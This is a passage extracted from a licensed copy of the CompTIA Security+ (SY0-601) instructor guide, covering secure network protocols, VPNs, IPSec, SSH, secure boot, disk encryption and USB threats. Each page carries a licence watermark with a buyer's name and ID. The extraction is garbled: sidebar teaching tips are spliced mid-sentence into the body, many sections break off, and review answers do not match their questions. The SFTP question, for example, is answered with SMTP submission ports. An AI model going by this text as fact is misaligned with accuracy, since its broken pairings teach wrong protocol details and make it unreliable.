Students may question
why the version field
reads TLS 1.2. This
field is prone to a
compatibility problem
when servers cannot
identify a new version.
As a workaround,
servers supporting
TLS 1.3 should use the
supported_versions
extension instead.
Viewing the TLS handshake in a Wireshark packet capture. Note that the connection is using TLS 1.3
and one of the shortened cipher suites (TLS_AES_256_GCM_SHA384).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 295
the URL carries a severe risk of exposure. APIs can use more secure authentication
and authorization methods, such as SAML and OAuth, but these still come with
secrets management requirements. Another API consideration is that usage should be
monitored to ensure only authorized endpoints are making transactions.
Employees may require access to all kinds of subscription services. Some examples Subscription Services
include:
• Market and financial intelligence and information.
• Reference and training materials in various formats (ebook and video, for instance).
• Software applications and cloud services paid for by subscription rather than
permanent licenses.
Most of this sort of content will be delivered by a secure web site or cloud application.
It may be necessary to provision authentication mechanisms for enterprise single sign-
on (SSO) access to the services.
Another use of subscriptions is a web feed, where updated articles or news items
are pushed to the client or browser. Web feeds are based on either the Really Simple
Syndication (RSS) or Atom formats, both of which use XML to mark up each document
supplied by the feed. It is possible that such feeds may be vulnerable to XML injection
style attacks, allowing an attacker to show malicious links or even interact with the file
system (https://mikeknoop.com/lxml-xxe-exploit).
Subscription services may also describe the outsourcing of network and security
components and procedures. There may also be subscription use of enterprise cloud
applications, which may be mediated by an access broker.
There are many means of transferring files across networks. A network operating File Transfer Services
system can host shared folders and files, enabling them to be copied or accessed over
the local network or via remote access (over a VPN, for instance). Email and messaging Teaching
apps can send files as attachments. HTTP supports file download (and uploads via Tip
various scripting mechanisms). There are also peer-to-peer file sharing services. Make sure students
Despite the availability of these newer protocols and services, the file transfer protocol know the differences
(FTP) remains very popular because it is efficient and has wide cross-platform support. between FTP, FTPS,
and SFTP, including
File Transfer Protocol which ports are
associated with which
A File Transfer Protocol (FTP) server is typically configured with several public variant.
directories, hosting files, and user accounts. Most HTTP servers also function as FTP
servers, and FTP services, accounts, and directories may be installed and enabled
by default when you install a web server. FTP is more efficient compared to file
attachments or HTTP file transfer, but has no security mechanisms. All authentication
and data transfer are communicated as plain text, meaning that credentials can easily
be picked out of any intercepted FTP traffic.
You should check that users do not install unauthorized servers on their PCs (a rogue
server). For example, a version of IIS that includes HTTP, FTP, and SMTP servers is shipped
with client versions of Windows, though it is not installed by default.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
296 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
• Implicit TLS (FTPS)—negotiate an SSL/TLS tunnel before the exchange of any FTP
commands. This mode uses the secure port 990 for the control connection.
FTPS is tricky to configure when there are firewalls between the client and server.
Consequently, FTPES is usually the preferred method.
• SMTPS—this establishes the secure connection before any SMTP commands (HELO,
for instance) are exchanged. This is also referred to as implicit TLS.
The STARTTLS method is generally more widely implemented than SMTPS. Typical
SMTP configurations use the following ports and secure services:
• Port 25—used for message relay (between SMTP servers or Message Transfer
Agents [MTA]). If security is required and supported by both servers, the STARTTLS
command can be used to set up the secure connection.
• Port 465—some providers and mail clients use this port for message submission
over implicit TLS (SMTPS), though this usage is now deprecated by standards
documentation.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 297
Show Slide(s)
Secure/Multipurpose
Internet Mail
Configuring mailbox access protocols on a server. Extensions
Teaching
A POP3 client application, such as Microsoft Outlook or Mozilla Thunderbird, Tip
establishes a TCP connection to the POP3 server over port 110. The user is
Stress the difference
authenticated (by username and password) and the contents of his or her mailbox between providing
are downloaded for processing on the local PC. POP3S is the secured version of the secure ports for
protocol, operating over TCP port 995 by default. accessing SMTP and
mailbox profiles with
Secure IMAP (IMAPS) the use of S/MIME to
authenticate senders
Compared to POP3, the Internet Message Access Protocol v4 (IMAP4) supports and encrypt messages.
permanent connections to a server and connecting multiple clients to the same You might also want
mailbox simultaneously. It also allows a client to manage mail folders on the server. to mention policy-
based encryption. This
Clients connect to IMAP over TCP port 143. They authenticate themselves then retrieve requires the use of
messages from the designated folders. As with other email protocols, the connection can S/MIME if there are
be secured by establishing an SSL/TLS tunnel. The default port for IMAPS is TCP port 993. matches to keywords
in a certain message.
If the recipient is
Secure/Multipurpose Internet Mail Extensions unknown/external
to the organization,
Connection security goes a long way toward preventing the compromise of email the message is held
accounts and the spoofing of email, but end-to-end encryption cannot usually be until a certificate has
guaranteed. Consequently, there is still a need for authentication and confidentiality been issued to them
to be applied on a per-message basis. One means of doing this is called Secure/ (knowledge.broadcom.
com/external/
Multipurpose Internet Mail Extensions (S/MIME). To use S/MIME, the user is issued a
article/169842/
digital certificate containing his or her public key, signed by a CA to establish its validity. define-a-policy-based-
The public key is a pair with a private key kept secret by the user. To establish the encryption-essenti.
exchange of secure emails, both users must be using S/MIME and exchange certificates: html).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
298 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
1. Alice sends Bob her digital certificate, containing her public key and validated
digital ID (an email address). She signs this message using her private key.
2. Bob uses the public key in the certificate to decode her signature and the
signature of the CA (or chain of CAs) validating her digital certificate and digital ID
and decides that he can trust Alice and her email address.
3. He responds with his digital certificate and public key and Alice, following the
same process, decides to trust Bob.
4. Both Alice and Bob now have one another's certificates in their trusted certificate
stores.
5. When Alice wants to send Bob a confidential message, she makes a hash of
the message and signs the hash using her private key. She then encrypts the
message, hash, and her public key using Bob's public key and sends a message to
Bob with this data as an S/MIME attachment.
6. Bob receives the message and decrypts the attachment using his private key.
He validates the signature and the integrity of the message by decrypting it with
Alice's public key and comparing her hash value with one he makes himself.
The Session Initiation Protocol (SIP) is one of the most widely used session control
protocols. SIP endpoints are the end-user devices (also known as user-agents), such
as IP-enabled handsets or client and server web conference software. Each device,
conference, or telephony user is assigned a unique SIP address known as a SIP Uniform
Resource Indicator (URI), such as sip:[email protected]
SIP endpoints can establish communications directly in a peer-to-peer architecture,
but it is more typical to use intermediary servers and directory servers. A SIP network
may also use gateways and private branch exchange (PBX) appliances to provide an
interface between the VoIP network and external telephone and cellular networks.
While SIP provides session management features, the actual delivery of real-time data
uses different protocols. The principal one is Real-time Transport Protocol (RTP).
A threat actor could exploit unencrypted voice and video communications to try
to intercept passwords, credit card details, and so on. Without strong mutual
authentication, connections are also vulnerable to man-in-the-middle attacks.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 299
Connection security for voice and video works in a similar manner to HTTPS. To initiate
the call, the secure version SIPS uses digital certificates to authenticate the endpoints
and establish a TLS tunnel. Where unencrypted SIP typically runs over TCP port 5060,
SIPS uses TCP port 5061. The secure connection established by SIPS can also be used
to generate a master key to use with the secure versions of the transport protocol
(SRTP). SRTP provides confidentiality for the actual call data.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
300 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Secure Application Protocols
Answer the following questions:
1. What type of attack against HTTPS aims to force the server to negotiate
weak ciphers?
A downgrade attack.
2. A client and server have agreed on the use of the cipher suite ECDHE-ECDSA-
AES256- GCM-SHA384 for a TLS session. What is the key strength of the
symmetric encryption algorithm?
256-bit (AES).
3. What security protocol does SFTP use to protect the connection and which
port does an SFTP server listen on by default?
Port 587 with STARTTLS (explicit TLS) or port 465 with implicit TLS.
The recipient's public key (principally). The public key is used to encrypt a symmetric
session key and (for performance reasons) the session key does the actual data
encoding. The session key and, therefore, the message text can then only be recovered
by the recipient, who uses the linked private key to decrypt it.
Encrypted VoIP data is carried over the Secure Real-time Transport Protocol (SRTP).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 301
Topic 11C
Implement Secure Remote
Access Protocols
Remote access means that the user's device does not make a direct cabled or wireless Remote Access
connection to the network. The connection occurs over or through an intermediate Architecture (2)
network. Historically, remote access might have used analog modems connecting over
the telephone system or possibly a private link (a leased line). These days, most remote Teaching
access is implemented as a virtual private network (VPN), running over the Internet. Tip
Administering remote access involves essentially the same tasks as administering According to some
the local network. Only authorized users should be allowed access to local network definitions, a VPN
resources and communication channels. Additional complexity comes about because need not be secure.
it can be more difficult to ensure the security of remote workstations and servers and However, this is
what most people
there is greater opportunity for remote logins to be exploited. understand as a VPN
With a remote access VPN, clients connect to a VPN gateway on the edge of the private these days.
network. This is the "telecommuter" model, allowing home-workers and employees
working in the field to connect to the corporate network. The VPN protocol establishes
a secure tunnel so that the contents are kept private, even when the packets pass over
ISPs' routers.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
302 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
A VPN can also be deployed in a site-to-site model to connect two or more private
networks. Where remote access VPN connections are typically initiated by the client, a
site-to-site VPN is configured to operate automatically. The gateways exchange security
information using whichever protocol the VPN is based on. This establishes a trust
relationship between the gateways and sets up a secure connection through which
to tunnel data. Hosts at each site do not need to be configured with any information
about the VPN. The routing infrastructure at each site determines whether to deliver
traffic locally or send it over the VPN tunnel.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 303
Several VPN protocols have been used over the years. Legacy protocols such as the Transport Layer
Point-to-Point Tunneling Protocol (PPTP) have been deprecated because they do not Security VPN
offer adequate security. Transport Layer Security (TLS) and IPSec are now the preferred
options for configuring VPN access. Teaching
Tip
Explain that the
important point
about modern
VPNs is to hide
any authentication
information from
eavesdroppers.
Protocols such as
PPTP do not protect
the hash exchanged
during the CHAP/
MSCHAP handshake,
making the connection
extremely vulnerable
to offline cracking
attempts.
A TLS VPN (still more commonly referred to as an SSL VPN) requires a remote access
server listening on port 443 (or any arbitrary port number). The client makes a
connection to the server using TLS so that the server is authenticated to the client (and
optionally the client's certificate must be authenticated by the server). This creates
an encrypted tunnel for the user to submit authentication credentials, which would
normally be processed by a RADIUS server. Once the user is authenticated and the
connection fully established, the VPN gateway tunnels all communications for the local
network over the secure socket.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
304 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Configuring a client certificate for mutual authentication in the pfSense security appliance.
(Screenshot used with permission from Rubicon Communications, LLC.)
The port can be either TCP or UDP. UDP might be chosen for marginally superior
performance, especially when tunneling latency-sensitive traffic such as voice or video. TCP
Show Slide(s) might be easier to use with a default firewall policy. TLS over UDP is also referred to as
Datagram TLS (DTLS).
Internet Protocol
Security
OpenVPN is an open source example of a TLS VPN (openvpn.net). OpenVPN can work
in TAP (bridged) mode to tunnel layer 2 frames or in TUN (routed) mode to forward
Teaching
IP packets. Another option is Microsoft's Secure Sockets Tunneling Protocol (SSTP),
Tip
which works by tunneling Point-to-Point Protocol (PPP) layer 2 frames over a TLS
Point out that IPSec
session (docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sstp/70adc1df-
is an integral part of
IPv6. Its use with IPv4 c4fe-4b02-8872-f1d8b9ad806a). The Point-to-Point Protocol (PPP) is a widely
is a stop-gap until used remote dial-in protocol. It provides encapsulation for IP traffic plus IP address
Internet infrastructure assignment and authentication via the widely supported Challenge Handshake
finally switches over Authentication Protocol (CHAP).
to IPv6 ("the world's
largest software
upgrade"). Internet Protocol Security
Note that AH provides
only authentication Transport Layer Security is applied at the application level, either by using a separate
and integrity, not secure port or by using commands in the application protocol to negotiate a secure
confidentiality. connection. Internet Protocol Security (IPSec) operates at the network layer (layer
Note also that only 3) of the OSI model, so it can be implemented without having to configure specific
immutable fields in
application support. IPSec can provide both confidentiality (by encrypting data packets)
the IP header are used
in the ICV. The TTL and integrity/anti-replay (by signing each packet). The main drawback is that it adds
field is excluded, for overhead to data communications. IPSec can be used to secure communications on
instance. local networks and as a remote access protocol.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 305
When IPv6 was being drafted, IPSec was considered a mandatory component as it was
felt that all traffic over the new protocol should be secure. In recent years, RFCs have been
revised so that now, IPSec is recommended for IPv6 but no longer mandatory (tools.ietf.org/
html/rfc6434#page-17).
Each host that uses IPSec must be assigned a policy. An IPSec policy sets the
authentication mechanism and also the protocols and mode for the connection. Hosts
must be able to match at least one matching security method for a connection to
be established. There are two core protocols in IPSec, which can be applied singly or
together, depending on the policy.
IPSec datagram using AH—The integrity of the payload and IP header is ensured by the
Integrity Check Value (ICV), but the payload is not encrypted.
IPSec datagram using ESP—The TCP header and payload from the original packet are
encapsulated within ESP and encrypted to provide confidentiality.
With ESP, algorithms for both confidentiality (symmetric cipher) and authentication/integrity
(hash function) are usually applied together. It is possible to use one or the other, however.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
306 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Configuring an IPSec tunnel with ESP encryption in the pfSense security appliance.
(Screenshot used with permission from Rubicon Communications, LLC.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 307
The principles underlying IPSec are the same for IPv4 and IPv6, but the header formats
are different. IPSec makes use of extension headers in IPv6 while in IPv4, ESP and AH are
allocated new IP protocol numbers (50 and 51), and either modify the original IP header or
encapsulate the original packet, depending on whether transport or tunnel mode is used.
IPSec's encryption and hashing functions depend on a shared secret. The secret Internet Key Exchange
must be communicated to both hosts and the hosts must confirm one another's
identity (mutual authentication). Otherwise, the connection is vulnerable to man-in- Teaching
the-middle and spoofing attacks. The Internet Key Exchange (IKE) protocol handles Tip
authentication and key exchange, referred to as Security Associations (SA). Explain how IKE
provides a connection
and authentication
mechanism for IPSec.
2. Phase II uses the secure channel created in Phase 1 to establish which ciphers
and key sizes will be used with AH and/or ESP in the IPSec session.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
308 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Compared to L2TP/IPSec, using IKE v2 is more efficient. This solution is becoming much
better supported, with native support in Windows 10, for instance.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 309
• Full tunnel—Internet access is mediated by the corporate network, which will alter
the client's IP address and DNS servers and may use a proxy.
Full tunnel offers better security, but the network address translations and DNS
operations required may cause problems with some websites, especially cloud
services. It also means more data is channeled over the link.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
310 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Jump Servers
One of the challenges of managing hosts that are exposed to the Internet, such as in
a DMZ or cloud virtual network, is to provide administrative access to the servers and
appliances located within it. On the one hand, a link is necessary; on the other, the
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 311
Show Slide(s)
Secure Shell
Teaching
Tip
SSH is primarily for
Securing management traffic using a jump server. UNIX/Linux, though
there are Windows
versions. Windows
can also use the
proprietary Windows
Secure Shell Remote Management
(WinRM) and Windows
Secure Shell (SSH) is the principal means of obtaining secure remote access to a Remote Shell (WinRS).
command-line terminal. The main uses of SSH are for remote administration and Make sure students
secure file transfer (SFTP). There are numerous commercial and open source SSH understand the
products available for all the major NOS platforms. The most widely used is OpenSSH difference between
(openssh.com). identifying a server
via its host key, and
SSH servers are identified by a public/private key pair (the host key). A mapping of host connecting to the
names to public keys can be kept manually by each SSH client or there are various server using a client
enterprise software products designed for SSH host key management. public key.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
312 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Confirming the SSH server's host key using the PuTTY SSH client
(Screenshot used with permission from PuTTY.)
The host key must be changed if any compromise of the host is suspected. If an attacker has
obtained the private key of a server or appliance, they can masquerade as that server or
appliance and perform a man-in-the-middle attack, usually with a view to obtaining other
network credentials.
The server's host key is used to set up a secure channel to use for the client to submit
authentication credentials.
• Public key authentication—each remote user's public key is added to a list of keys
authorized for each local account on the SSH server.
Managing valid client public keys is a critical security task. Many recent attacks on web
servers have exploited poor key management. If a user's private key is compromised, delete
the public key from the appliance then regenerate the key pair on the user's (remediated)
client device and copy the public key to the SSH server. Always delete public keys if the user's
access permissions have been revoked.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 313
SSH Commands
SSH commands are used to connect to hosts and set up authentication methods. To
connect to an SSH server at 10.1.0.10 using an account named "bobby" and password
authentication, run:
ssh [email protected]
The following commands create a new key pair and copy it to an account on the
remote server:
ssh-keygen -t rsa
ssh-copy-id [email protected]
At an SSH prompt, you can now use the standard Linux shell commands. Use exit to
close the connection.
You can also use the scp command to copy a file from the remote server to the
local host:
scp [email protected]:/logs/audit.log audit.log
Reverse the arguments to copy a file from the local host to the remote server. To copy
the contents of a directory and any subdirectories (recursively), use the -r option.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
314 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Secure Remote Access Protocols
Answer the following questions:
1. True or false? A TLS VPN can only provide access to web-based network
resources.
False—a Transport Layer Security (TLS) VPN uses TLS to encapsulate the private
network data and tunnel it over the network. The private network data could be frames
or IP-level packets and is not constrained by application-layer protocol type.
3. What IPSec mode would you use for data confidentiality on a private
network?
Transport mode with Encapsulating Security Payload (ESP). Tunnel mode encrypts the
IP header information, but this is unnecessary on a private network. Authentication
Header (AH) provides message authentication and integrity but not confidentiality.
Rather than just providing mutual authentication of the host endpoints, IKE v2 supports
a user account authentication method, such as Extensible Authentication Protocol
(EAP).
The server's public key (host key). Note that this can only be trusted if the client trusts
that the public key is valid. The client might confirm this manually or using a Certificate
Authority.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 315
Lesson 11
Summary
You should be able to configure secure protocols for local network access and Teaching
management, application services, and remote access and management. Tip
Check that students
Guidelines for Implementing Secure Network Protocols are confident about
the content that has
been covered. If there
Follow these guidelines when you implement or reconfigure network protocols: is time, re-visit any
• Ensure availability for critical network address allocation (DHCP), name resolution content examples that
they have questions
(DNS), directory access (LDAP), and time synchronization (NTP) services. Monitor the
about. If you have
network to detect and remove rogue services. used all the available
time for this lesson
• Consider using SNMP for monitoring service availability. block, note the issues,
and schedule time for
• Assess the requirements for securing an application protocol, such as certificates or a review later in the
shared keys for authentication and TCP/UDP port usage. Ensure secure distribution course.
of credentials and create configuration documentation for secure usage.
• Deploy certificates to email servers to use with secure SMTP, POP3, and IMAP.
• Deploy certificates or host keys to file servers to use with FTPS or SFTP.
• Deploy certificates to VoIP gateways and endpoints to use with SIPS and SRTP.
• Deploy certificates or shared keys to VPN gateways and clients for use with TLS
VPNs, IPSec, and L2TP/IPSec.
• Configure RDP gateways and SSH servers with certificates or host keys. Configure
client authentication using user credentials or public keys.
• Implement SAWs and out-of-band network interfaces or jump servers for secure
remote management of servers and network infrastructure.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
Lesson 12
Implementing Host Security Solutions
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
318 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Topic 12A
Implement Secure Firmware
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 319
Show Slide(s)
Configuring a Trusted Platform Module using system setup on an HP workstation. Boot Integrity
(Screenshot used with permission from HP.)
Teaching
Tip
The problem with establishing a hardware root of trust is that devices are used in
We assume that
environments where anyone can get complete control over them. There cannot be students know what
complete assurance that the firmware underpinning the hardware root of trust is UEFI is from A+. If not,
inviolable, but attacks against trusted modules are sufficiently difficult so as to provide consider explaining
effective security in most cases. the difference
between BIOS and
UEFI, though BIOS
Boot Integrity motherboards are
increasingly scarce.
Most PCs and smartphones implement the unified extensible firmware interface Explain how UEFI
(UEFI). UEFI provides code that allows the host to boot to an OS. UEFI can enforce a is accessed and
number of boot integrity checks. configured.
Make sure students
Secure Boot can distinguish secure
boot from measured
Secure boot is designed to prevent a computer from being hijacked by a malicious OS. boot. Secure boot is
about provisioning
UEFI is configured with digital certificates from valid OS vendors. The system firmware certificates for trusted
checks the operating system boot loader and kernel using the stored certificate to operating systems and
ensure that it has been digitally signed by the OS vendor. This prevents a boot loader blocking unauthorized
or kernel that has been changed by malware (or an OS installed without authorization) OSes. Measured
from being used. Secure boot is supported on Windows (docs.microsoft.com/en-us/ boot stores and
compares hashes of
windows/security/information-protection/secure-the-windows-10-boot-process) and
critical boot files to
many Linux platforms (wiki.ubuntu.com/UEFI/SecureBoot). Secure boot requires UEFI, detect unauthorized
but does not require a TPM. processes.
Attestation is the
Measured Boot process of sending
a signed boot log or
A trusted or measured boot process uses platform configuration registers (PCRs) report to a remote
in the TPM at each stage in the boot process to check whether hashes of key system server.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
320 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
state data (boot firmware, boot loader, OS kernel, and critical drivers) have changed.
This does not usually prevent boot, but it will record the presence of unsigned kernel-
level code.
Boot Attestation
Boot attestation is the capability to transmit a boot log report signed by the TPM via a
trusted process to a remote server, such as a network access control server. The boot
log can be analyzed for signs of compromise, such as the presence of unsigned drivers.
The host can be prevented from accessing the network if it does not meet the required
health policy or if no attestation report is received.
Show Slide(s)
Disk Encryption
Teaching
Tip
Opal is complex, with
different options
for consumer and
enterprise grades.
Students can refer to
the white paper and
TCG slides for more
detail. This should
not be required Configuring secure boot settings via an HP workstation's UEFI firmware setup program.
for the exam, but if (Screenshot used with permission from HP.)
you want to give an
overview, note that
enterprise grades
support multiple
locking ranges that Disk Encryption
can be associated with
different DEKs and Full disk encryption (FDE) means that the entire contents of the drive (or volume),
users. There is also a including system files and folders, are encrypted. OS ACL-based security measures
parallel specification are quite simple to circumvent if an adversary can attach the drive to a different host
(TCG Storage Security OS. Drive encryption allays this security concern by making the contents of the drive
Subsystem Class: accessible only in combination with the correct encryption key. Disk encryption can be
Enterprise) aimed at
SCSI/SAS devices. applied to both hard disk drives (HDDs) and solid state drives (SSDs).
Note that SED is one FDE requires the secure storage of the key used to encrypt the drive contents.
of the best methods Normally, this is stored in a TPM. The TPM chip has a secure storage area that a disk
of media sanitization, encryption program, such as Windows BitLocker, can write its keys to. It is also possible
via the Crypto Erase
function. We'll discuss
to use a removable USB drive (if USB is a boot device option). As part of the setup
sanitization at the end process, you create a recovery password or key. This can be used if the disk is moved
of the course. to another computer or the TPM is damaged.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 321
Activating BitLocker drive encryption. (Screenshot used with permission from Microsoft.)
One of the drawbacks of FDE is that, because the OS performs the cryptographic
operations, performance is reduced. This issue is mitigated by self-encrypting drives
(SED), where the cryptographic operations are performed by the drive controller. The
SED uses a symmetric data/media encryption key (DEK/MEK) for bulk encryption and
stores the DEK securely by encrypting it with an asymmetric key pair called either the
authentication key (AK) or key encryption key (KEK). Use of the AK is authenticated by
the user password. This means that the user password can be changed without having
to decrypt and re-encrypt the drive. Early types of SEDs used proprietary mechanisms,
but many vendors now develop to the Opal Storage Specification (nvmexpress.org/
wp-content/uploads/TCGandNVMe_Joint_White_Paper-TCG_Storage_Opal_and_NVMe_
FINAL.pdf), developed by the Trusted Computing Group (TCG).
As configuring passwords on individual drives is a huge challenge when more than a few
machines are involved, enterprises may use the Key Management Interoperability Protocol
(KMIP) along with a hardware security module (HSM) to automate the provisioning of
keys (trustedcomputinggroup.org/wp-content/uploads/SWG_TCG_Enterprise-Introduction_
Sept2010.pdf).
As revealed by researcher Karsten Nohl in his BadUSB paper (srlabs.de/wp-content/ USB and Flash Drive
uploads/2014/07/SRLabs-BadUSB-BlackHat-v1.pdf), exploiting the firmware of external Security
storage devices, such as USB flash drives (and potentially any other type of firmware),
presents adversaries with an incredible toolkit. The firmware can be reprogrammed Teaching
to make the device look like another device class, such as a keyboard. In this case it Tip
could then be used to inject a series of keystrokes upon an attachment or work as Make sure students
a keylogger. The device could also be programmed to act like a network device and understand the risks
corrupt name resolution, redirecting the user to malicious websites. from USB devices
and how to identify
Another example is the O.MG cable (theverge.com/2019/8/15/20807854/apple-mac- indicators of attacks.
lightning-cable-hack-mike-grover-mg-omg-cables-defcon-cybersecurity), which packs
enough processing capability into an ordinary-looking USB-Lightning cable to run an
access point and keylogger.
A modified device may have visual clues that distinguish it from a mass manufactured
thumb drive or cable, but these may be difficult to spot. You should warn users of the
risks and repeat the advice to never attach devices of unknown provenance to their
computers and smartphones. If you suspect a device as an attack vector, observe a
sandboxed lab system (sometimes referred to as a sheep dip) closely when attaching
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
322 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
the device. Look for command prompt windows or processes such as the command
interpreter starting and changes to the registry or other system files.
Not all attacks have to be so esoteric. USB sticks infected with ordinary malware are still
incredibly prolific infection vectors. Hosts should always be configured to prevent autorun
when USB devices are attached. USB ports can be blocked altogether using most types of
Host Intrusion Detection Systems (HIDS).
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 323
It is also possible for both open source and commercial projects to be abandoned; if a
company continues to rely on such abandonware, it will have to assume development
responsibility for it. There are many instances of applications and devices (peripheral
devices especially) that remain on sale with serious known vulnerabilities in firmware
or drivers and no prospect of vendor support for a fix. The problem is also noticeable
in consumer-grade networking appliances and in the Internet of Things. When
provisioning a supplier for applications and devices, it is vital to establish that they have
effective security management lifecycles for their products.
It is important to remember that although one can outsource virtually any service or Organizational
activity to a third party, one cannot outsource legal accountability for these services Security Agreements
or actions. You are ultimately responsible for the services and actions that these third
parties take. If they have any access to your data or systems, any security breach in their Teaching
organization (for example, unauthorized data sharing) is effectively a breach in yours. Tip
Issues of security risk awareness, shared duties, and contractual responsibilities can be We don't try to
set out in a formal legal agreement. The following types of agreements are common: go into any detail
here—just make sure
• Memorandum of understanding (MOU)—A preliminary or exploratory agreement students know the
to express an intent to work together. MOUs are usually intended to be relatively basic purpose of each
informal and not to act as binding contracts. MOUs almost always have clauses agreement type.
stating that the parties shall respect confidentiality, however.
• Service level agreement (SLA)—A contractual agreement setting out the detailed
terms under which a service is provided.
A legal agreement is all very well, but it is still up to you to make sure that your
suppliers, vendors, and contractors can live up to it. If they can't, you may successfully
sue them, but if they go out of business, you are still accountable for their actions or
failures to act.
Conversely, you need to ensure that you can comply with the requirements and
performance standards of any agreements that you enter into as a service provider.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
324 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
Review Activity:
Secure Firmware
Answer the following questions:
The Trusted Platform Module (TPM) is a tamper-proof (at least in theory) cryptographic
module embedded in the CPU or chipset. This can provide a means to sign the report
of the system configuration so that a network access control (NAC) policy enforcer can
trust it.
2. Why are OS-enforced file access controls not sufficient in the event of the
loss or theft of a computer or mobile device?
The disk (or other storage) could be attached to a foreign system and the administrator
could take ownership of the files. File-level, full disk encryption (FDE), or self-encrypting
drives (SED) mitigate this by requiring the presence of the user's decryption key to read
the data.
A trusted platform module provides a secure mechanism for creating and storing the
key used to encrypt the data. Access to the key is provided by configuring a password.
The alternative is usually to store the private key on a USB stick.
Only use reputable suppliers for peripheral devices and strictly controlled sources for
firmware updates. Consider use of a sheep dip sandboxed system to observe a device
before allowing it to be attached to a host in the enterprise network. Use execution
control software to allow only approved USB vendors.
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 325
Topic 12B
Implement Endpoint Security
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
326 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)
It is also important to establish a maintenance cycle for each device and keep up to
date with new security threats and responses for the particular software products that
you are running.
Using Security Compliance Manager to compare settings in a production GPO with Microsoft's
template policy settings. (Screenshot used with permission from Microsoft.)
LICENSED FOR USE ONLY BY: ATUL MALHOTRA · 8375311 · MAY 05 2022
The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 327
be effective at discovering missing patches for the operating system, plus a wide range Teaching
of third-party software apps and devices/firmware. Scanning is only useful if effective Tip
procedures are in-place to apply the missing patches, however. Unpatched client
On residential and small networks, hosts will be configured to auto-update, meaning applications and web
application servers
that they check for and install patches automatically. The major OS and applications (corrupting trusted
software products are well-supported in terms of vendor-supplied fixes for security websites through
issues. Enterprise networks need to be cautious about this sort of automated the site owner's lax
deployment, however, as a patch that is incompatible with an application or workflow security) remain one
can cause availability issues. There can also be performance and management issues of the biggest security
issues at the current
when multiple applications run update clients on the same host. For example, as well
time (Equifax for
as the OS updater, there is likely to be a security software update, browser updater, instance, theregister.
